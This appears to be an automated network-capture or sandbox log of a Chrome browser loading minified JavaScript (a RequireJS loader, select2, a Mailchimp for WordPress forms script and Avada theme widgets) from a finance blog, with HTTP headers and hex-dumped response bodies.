                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC1369INData Raw: 2e 73 70 6c 69 63 65 28 75 2d 31 2c 32 29 2c 75 2d 3d 32 29 7d 65 3d 65 2e 6a 6f 69 6e 28 22 2f 22 29 7d 69 66 28 28 68 7c 7c 67 29 26 26 66 29 7b 66 6f 72 28 75 3d 28 6e 3d 65 2e 73 70 6c 69 74 28 22 2f 22 29 29 2e 6c 65 6e 67 74 68 3b 30 3c 75 3b 75 2d 3d 31 29 7b 69 66 28 69 3d 6e 2e 73 6c 69 63 65 28 30 2c 75 29 2e 6a 6f 69 6e 28 22 2f 22 29 2c 68 29 66 6f 72 28 64 3d 68 2e 6c 65 6e 67 74 68 3b 30 3c 64 3b 64 2d 3d 31 29 69 66 28 72 3d 28 72 3d 66 5b 68 2e 73 6c 69 63 65 28 30 2c 64 29 2e 6a 6f 69 6e 28 22 2f 22 29 5d 29 26 26 72 5b 69 5d 29 7b 6f 3d 72 2c 61 3d 75 3b 62 72 65 61 6b 7d 69 66 28 6f 29 62 72 65 61 6b 3b 21 6c 26 26 67 26 26 67 5b 69 5d 26 26 28 6c 3d 67 5b 69 5d 2c 63 3d 75 29 7d 21 6f 26 26 6c 26 26 28 6f 3d 6c 2c 61 3d 63 29 2c 6f 26
                                                                                                                                                                                                                                                                        Data Ascii: .splice(u-1,2),u-=2)}e=e.join("/")}if((h||g)&&f){for(u=(n=e.split("/")).length;0<u;u-=1){if(i=n.slice(0,u).join("/"),h)for(d=h.length;0<d;d-=1)if(r=(r=f[h.slice(0,d).join("/")])&&r[i]){o=r,a=u;break}if(o)break;!l&&g&&g[i]&&(l=g[i],c=u)}!o&&l&&(o=l,a=c),o&
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC1369INData Raw: 3d 74 79 70 65 6f 66 20 6e 3b 69 66 28 63 3d 53 28 69 3d 69 7c 7c 65 29 2c 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 70 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 70 29 7b 66 6f 72 28 74 3d 21 74 2e 6c 65 6e 67 74 68 26 26 6e 2e 6c 65 6e 67 74 68 3f 5b 22 72 65 71 75 69 72 65 22 2c 22 65 78 70 6f 72 74 73 22 2c 22 6d 6f 64 75 6c 65 22 5d 3a 74 2c 6c 3d 30 3b 6c 3c 74 2e 6c 65 6e 67 74 68 3b 6c 2b 3d 31 29 69 66 28 22 72 65 71 75 69 72 65 22 3d 3d 3d 28 6f 3d 28 61 3d 66 28 74 5b 6c 5d 2c 63 29 29 2e 66 29 29 64 5b 6c 5d 3d 67 2e 72 65 71 75 69 72 65 28 65 29 3b 65 6c 73 65 20 69 66 28 22 65 78 70 6f 72 74 73 22 3d 3d 3d 6f 29 64 5b 6c 5d 3d 67 2e 65 78 70 6f 72 74 73 28 65 29 2c 75 3d 21 30 3b 65 6c 73 65 20 69 66 28 22 6d 6f 64 75 6c 65 22 3d 3d 3d 6f 29 72
                                                                                                                                                                                                                                                                        Data Ascii: =typeof n;if(c=S(i=i||e),"undefined"==p||"function"==p){for(t=!t.length&&n.length?["require","exports","module"]:t,l=0;l<t.length;l+=1)if("require"===(o=(a=f(t[l],c)).f))d[l]=g.require(e);else if("exports"===o)d[l]=g.exports(e),u=!0;else if("module"===o)r
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC1369INData Raw: 28 22 73 65 6c 65 63 74 32 2f 75 74 69 6c 73 22 2c 5b 22 6a 71 75 65 72 79 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 76 61 72 20 72 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 76 61 72 20 74 3d 65 2e 70 72 6f 74 6f 74 79 70 65 2c 6e 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 69 20 69 6e 20 74 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 5b 69 5d 26 26 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 21 3d 3d 69 26 26 6e 2e 70 75 73 68 28 69 29 7d 72 65 74 75 72 6e 20 6e 7d 72 2e 45 78 74 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 3b 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 65 7d 66 6f 72 28 76 61 72 20 72 20 69
                                                                                                                                                                                                                                                                        Data Ascii: ("select2/utils",["jquery"],function(o){var r={};function u(e){var t=e.prototype,n=[];for(var i in t){"function"==typeof t[i]&&"constructor"!==i&&n.push(i)}return n}r.Extend=function(e,t){var n={}.hasOwnProperty;function i(){this.constructor=e}for(var r i
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC1369INData Raw: 2e 6c 69 73 74 65 6e 65 72 73 5b 65 5d 2c 74 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 31 29 29 2c 22 2a 22 69 6e 20 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 26 26 74 68 69 73 2e 69 6e 76 6f 6b 65 28 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 5b 22 2a 22 5d 2c 61 72 67 75 6d 65 6e 74 73 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 76 6f 6b 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 69 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 69 3b 6e 2b 2b 29 65 5b 6e 5d 2e 61 70 70 6c 79 28 74 68 69 73 2c 74 29 7d 2c 72 2e 4f 62 73 65 72 76 61 62 6c 65 3d 65 2c 72 2e 67 65 6e 65 72 61 74 65 43 68 61 72 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 22 22 2c 6e 3d 30 3b 6e 3c 65 3b 6e 2b 2b 29 7b 74
                                                                                                                                                                                                                                                                        Data Ascii: .listeners[e],t.call(arguments,1)),"*"in this.listeners&&this.invoke(this.listeners["*"],arguments)},e.prototype.invoke=function(e,t){for(var n=0,i=e.length;n<i;n++)e[n].apply(this,t)},r.Observable=e,r.generateChars=function(e){for(var t="",n=0;n<e;n++){t
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC1369INData Raw: 2e 74 6f 53 74 72 69 6e 67 28 29 29 29 2c 74 7d 2c 72 2e 53 74 6f 72 65 44 61 74 61 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 69 3d 72 2e 47 65 74 55 6e 69 71 75 65 45 6c 65 6d 65 6e 74 49 64 28 65 29 3b 72 2e 5f 5f 63 61 63 68 65 5b 69 5d 7c 7c 28 72 2e 5f 5f 63 61 63 68 65 5b 69 5d 3d 7b 7d 29 2c 72 2e 5f 5f 63 61 63 68 65 5b 69 5d 5b 74 5d 3d 6e 7d 2c 72 2e 47 65 74 44 61 74 61 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 72 2e 47 65 74 55 6e 69 71 75 65 45 6c 65 6d 65 6e 74 49 64 28 65 29 3b 72 65 74 75 72 6e 20 74 3f 72 2e 5f 5f 63 61 63 68 65 5b 6e 5d 26 26 6e 75 6c 6c 21 3d 72 2e 5f 5f 63 61 63 68 65 5b 6e 5d 5b 74 5d 3f 72 2e 5f 5f 63 61 63 68 65 5b 6e 5d 5b 74 5d 3a 6f 28 65 29 2e 64 61 74 61 28 74 29 3a 72
                                                                                                                                                                                                                                                                        Data Ascii: .toString())),t},r.StoreData=function(e,t,n){var i=r.GetUniqueElementId(e);r.__cache[i]||(r.__cache[i]={}),r.__cache[i][t]=n},r.GetData=function(e,t){var n=r.GetUniqueElementId(e);return t?r.__cache[n]&&null!=r.__cache[n][t]?r.__cache[n][t]:o(e).data(t):r
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC1369INData Raw: 74 68 29 7b 65 2e 72 65 73 75 6c 74 73 3d 74 68 69 73 2e 73 6f 72 74 28 65 2e 72 65 73 75 6c 74 73 29 3b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 72 65 73 75 6c 74 73 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 2e 72 65 73 75 6c 74 73 5b 6e 5d 2c 72 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 28 69 29 3b 74 2e 70 75 73 68 28 72 29 7d 74 68 69 73 2e 24 72 65 73 75 6c 74 73 2e 61 70 70 65 6e 64 28 74 29 7d 65 6c 73 65 20 30 3d 3d 3d 74 68 69 73 2e 24 72 65 73 75 6c 74 73 2e 63 68 69 6c 64 72 65 6e 28 29 2e 6c 65 6e 67 74 68 26 26 74 68 69 73 2e 74 72 69 67 67 65 72 28 22 72 65 73 75 6c 74 73 3a 6d 65 73 73 61 67 65 22 2c 7b 6d 65 73 73 61 67 65 3a 22 6e 6f 52 65 73 75 6c 74 73 22 7d 29 7d 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 70 6f 73 69 74
                                                                                                                                                                                                                                                                        Data Ascii: th){e.results=this.sort(e.results);for(var n=0;n<e.results.length;n++){var i=e.results[n],r=this.option(i);t.push(r)}this.$results.append(t)}else 0===this.$results.children().length&&this.trigger("results:message",{message:"noResults"})},i.prototype.posit
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC1369INData Raw: 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 6c 69 22 29 3b 74 2e 63 6c 61 73 73 4e 61 6d 65 3d 22 73 65 6c 65 63 74 32 2d 72 65 73 75 6c 74 73 5f 5f 6f 70 74 69 6f 6e 22 3b 76 61 72 20 6e 3d 7b 72 6f 6c 65 3a 22 6f 70 74 69 6f 6e 22 2c 22 61 72 69 61 2d 73 65 6c 65 63 74 65 64 22 3a 22 66 61 6c 73 65 22 7d 2c 69 3d 77 69 6e 64 6f 77 2e 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 61 74 63 68 65 73 7c 7c 77 69 6e 64 6f 77 2e 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 73 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 7c 7c 77 69 6e 64 6f 77 2e 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 77 65 62 6b 69 74 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 3b 66 6f 72 28 76 61 72 20 72 20 69 6e 28 6e 75 6c 6c 21 3d 65 2e 65 6c 65 6d
                                                                                                                                                                                                                                                                        Data Ascii: reateElement("li");t.className="select2-results__option";var n={role:"option","aria-selected":"false"},i=window.Element.prototype.matches||window.Element.prototype.msMatchesSelector||window.Element.prototype.webkitMatchesSelector;for(var r in(null!=e.elem
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC1369INData Raw: 61 73 73 65 73 28 29 2c 6c 2e 6f 70 74 69 6f 6e 73 2e 67 65 74 28 22 73 63 72 6f 6c 6c 41 66 74 65 72 53 65 6c 65 63 74 22 29 26 26 6c 2e 68 69 67 68 6c 69 67 68 74 46 69 72 73 74 49 74 65 6d 28 29 29 7d 29 2c 74 2e 6f 6e 28 22 75 6e 73 65 6c 65 63 74 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 69 73 4f 70 65 6e 28 29 26 26 28 6c 2e 73 65 74 43 6c 61 73 73 65 73 28 29 2c 6c 2e 6f 70 74 69 6f 6e 73 2e 67 65 74 28 22 73 63 72 6f 6c 6c 41 66 74 65 72 53 65 6c 65 63 74 22 29 26 26 6c 2e 68 69 67 68 6c 69 67 68 74 46 69 72 73 74 49 74 65 6d 28 29 29 7d 29 2c 74 2e 6f 6e 28 22 6f 70 65 6e 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 2e 24 72 65 73 75 6c 74 73 2e 61 74 74 72 28 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 2c 22 74 72 75 65 22 29 2c 6c 2e 24 72 65
                                                                                                                                                                                                                                                                        Data Ascii: asses(),l.options.get("scrollAfterSelect")&&l.highlightFirstItem())}),t.on("unselect",function(){t.isOpen()&&(l.setClasses(),l.options.get("scrollAfterSelect")&&l.highlightFirstItem())}),t.on("open",function(){l.$results.attr("aria-expanded","true"),l.$re
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC1369INData Raw: 69 2e 6f 75 74 65 72 48 65 69 67 68 74 28 21 31 29 2c 73 3d 6c 2e 24 72 65 73 75 6c 74 73 2e 73 63 72 6f 6c 6c 54 6f 70 28 29 2b 6f 2d 72 3b 30 3d 3d 3d 6e 3f 6c 2e 24 72 65 73 75 6c 74 73 2e 73 63 72 6f 6c 6c 54 6f 70 28 30 29 3a 72 3c 6f 26 26 6c 2e 24 72 65 73 75 6c 74 73 2e 73 63 72 6f 6c 6c 54 6f 70 28 73 29 7d 7d 29 2c 74 2e 6f 6e 28 22 72 65 73 75 6c 74 73 3a 66 6f 63 75 73 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 65 6c 65 6d 65 6e 74 2e 61 64 64 43 6c 61 73 73 28 22 73 65 6c 65 63 74 32 2d 72 65 73 75 6c 74 73 5f 5f 6f 70 74 69 6f 6e 2d 2d 68 69 67 68 6c 69 67 68 74 65 64 22 29 7d 29 2c 74 2e 6f 6e 28 22 72 65 73 75 6c 74 73 3a 6d 65 73 73 61 67 65 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 2e 64 69 73 70 6c 61 79 4d 65 73 73 61 67 65 28
                                                                                                                                                                                                                                                                        Data Ascii: i.outerHeight(!1),s=l.$results.scrollTop()+o-r;0===n?l.$results.scrollTop(0):r<o&&l.$results.scrollTop(s)}}),t.on("results:focus",function(e){e.element.addClass("select2-results__option--highlighted")}),t.on("results:message",function(e){l.displayMessage(


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        88192.168.2.449846141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC828OUTGET /wp-content/cache/min/1/wp-content/plugins/mc4wp-premium/ajax-forms/assets/js/ajax-forms.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:56 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-cbc"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147813
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba080fcc42e7-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC878INData Raw: 63 62 63 0d 0a 21 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 2c 69 2c 73 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 21 69 5b 65 5d 29 7b 69 66 28 21 6e 5b 65 5d 29 7b 76 61 72 20 72 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 26 26 72 65 71 75 69 72 65 3b 69 66 28 21 74 26 26 72 29 72 65 74 75 72 6e 20 72 28 65 2c 21 30 29 3b 69 66 28 63 29 72 65 74 75 72 6e 20 63 28 65 2c 21 30 29 3b 74 68 72 6f 77 28 74 3d 6e 65 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 6d 6f 64 75 6c 65 20 27 22 2b 65 2b 22 27 22 29 29 2e 63 6f 64 65 3d 22 4d 4f 44 55 4c 45 5f 4e 4f 54 5f 46 4f 55 4e 44 22 2c 74 7d 72 3d 69 5b 65 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 2c 6e 5b 65 5d 5b 30 5d 2e 63 61 6c 6c 28 72
                                                                                                                                                                                                                                                                        Data Ascii: cbc!function o(n,i,s){function a(e,t){if(!i[e]){if(!n[e]){var r="function"==typeof require&&require;if(!t&&r)return r(e,!0);if(c)return c(e,!0);throw(t=new Error("Cannot find module '"+e+"'")).code="MODULE_NOT_FOUND",t}r=i[e]={exports:{}},n[e][0].call(r
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC1369INData Raw: 65 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 77 69 6e 64 6f 77 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 74 68 69 73 2e 62 75 74 74 6f 6e 29 2e 77 69 64 74 68 2c 69 28 65 2c 6f 29 2c 74 68 69 73 2e 6c 6f 61 64 69 6e 67 49 6e 74 65 72 76 61 6c 3d 77 69 6e 64 6f 77 2e 73 65 74 49 6e 74 65 72 76 61 6c 28 74 68 69 73 2e 74 69 63 6b 2e 62 69 6e 64 28 74 68 69 73 29 2c 35 30 30 29 29 3a 72 2e 73 74 79 6c 65 2e 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 2c 72 2e 63 6c 61 73 73 4e 61 6d 65 2b 3d 22 20 6d 63 34 77 70 2d 6c 6f 61 64 69 6e 67 22 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 73 74 6f 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 62 75 74 74 6f 6e 2c 65 3d 74 68 69 73 2e 6f 72 69 67 69 6e 61 6c 42 75 74 74 6f 6e 2c 72 3d 74
                                                                                                                                                                                                                                                                        Data Ascii: e.style.width=window.getComputedStyle(this.button).width,i(e,o),this.loadingInterval=window.setInterval(this.tick.bind(this),500)):r.style.opacity="0.5",r.className+=" mc4wp-loading"},o.prototype.stop=function(){var t=this.button,e=this.originalButton,r=t
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC1020INData Raw: 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 72 2e 64 61 74 61 2e 72 65 64 69 72 65 63 74 5f 74 6f 29 29 7d 63 61 74 63 68 28 74 29 7b 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 27 4d 61 69 6c 63 68 69 6d 70 20 66 6f 72 20 57 6f 72 64 50 72 65 73 73 3a 20 66 61 69 6c 65 64 20 74 6f 20 70 61 72 73 65 20 72 65 73 70 6f 6e 73 65 3a 20 22 27 2e 63 6f 6e 63 61 74 28 74 2c 27 22 27 29 29 2c 69 2e 73 65 74 52 65 73 70 6f 6e 73 65 28 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 63 34 77 70 2d 61 6c 65 72 74 20 6d 63 34 77 70 2d 65 72 72 6f 72 22 3e 3c 70 3e 27 2e 63 6f 6e 63 61 74 28 63 2e 65 72 72 6f 72 5f 74 65 78 74 2c 22 3c 2f 70 3e 3c 2f 64 69 76 3e 22 29 29 7d 65 6c 73 65 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 27 4d 61 69 6c 43 68 69 6d 70 20
                                                                                                                                                                                                                                                                        Data Ascii: ndow.location.href=r.data.redirect_to))}catch(t){console.error('Mailchimp for WordPress: failed to parse response: "'.concat(t,'"')),i.setResponse('<div class="mc4wp-alert mc4wp-error"><p>'.concat(c.error_text,"</p></div>"))}else console.error('MailChimp
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        89192.168.2.449847141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC838OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/awb-tabs-widget.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:57 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-1f6"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147814
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba08887e4388-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC509INData Raw: 31 66 36 0d 0a 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 72 65 61 64 79 20 66 75 73 69 6f 6e 2d 77 69 64 67 65 74 2d 72 65 6e 64 65 72 2d 46 75 73 69 6f 6e 5f 57 69 64 67 65 74 5f 54 61 62 73 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6a 51 75 65 72 79 28 22 2e 66 75 73 69 6f 6e 2d 74 61 62 73 2d 77 69 64 67 65 74 20 2e 66 75 73 69 6f 6e 2d 74 61 62 73 2d 6e 61 76 20 6c 69 20 61 22 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 22 6c 69 6e 6b 22 29 3b 6e 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 73 28 22 2e 66 75 73 69 6f 6e 2d 74 61 62 73 2d 6e 61 76 22 29 2e 66 69 6e 64
                                                                                                                                                                                                                                                                        Data Ascii: 1f6jQuery(document).on("ready fusion-widget-render-Fusion_Widget_Tabs",function(){jQuery(".fusion-tabs-widget .fusion-tabs-nav li a").on("click",function(n){var t=jQuery(this).data("link");n.preventDefault(),jQuery(this).parents(".fusion-tabs-nav").find
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        90192.168.2.449848141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:56 UTC847OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/awb-vertical-menu-widget.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:57 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-571"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147814
